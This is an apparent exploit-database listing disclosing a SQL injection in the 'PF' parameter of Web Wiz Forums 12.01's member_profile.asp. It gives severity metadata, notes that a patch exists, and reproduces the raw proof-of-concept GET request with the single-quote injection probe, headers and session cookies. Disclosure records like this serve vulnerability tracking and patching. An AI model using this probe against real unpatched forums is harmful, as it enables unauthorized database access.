Web Wiz Forums 12.01 - 'PF' SQL Injection

vendor:

Web Wiz Forums

by:

n1x_ [MS-WEB]

9.0

CVSS

HIGH

SQL Injection

CWE

Product Name: Web Wiz Forums

Affected Version From: 12.01

Affected Version To: 12.01

Patch Exists: YES

Related CWE: N/A

CPE: a:webwiz:web_wiz_forums:12.01

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows

2019

Web Wiz Forums 12.01 – ‘PF’ SQL Injection

Web Wiz Forums 12.01 is vulnerable to SQL injection in the 'PF' parameter of the 'member_profile.asp' page. An attacker can inject arbitrary SQL code in the 'PF' parameter and execute it in the context of the application.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
# Date: 2019-09-16
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
# Version: 12.01
# Tested on Windows

# Vulnerable parameter: PF (member_profile.asp)
# GET Request

GET /member_profile.asp?PF=10' HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
Connection: close
Upgrade-Insecure-Requests: 1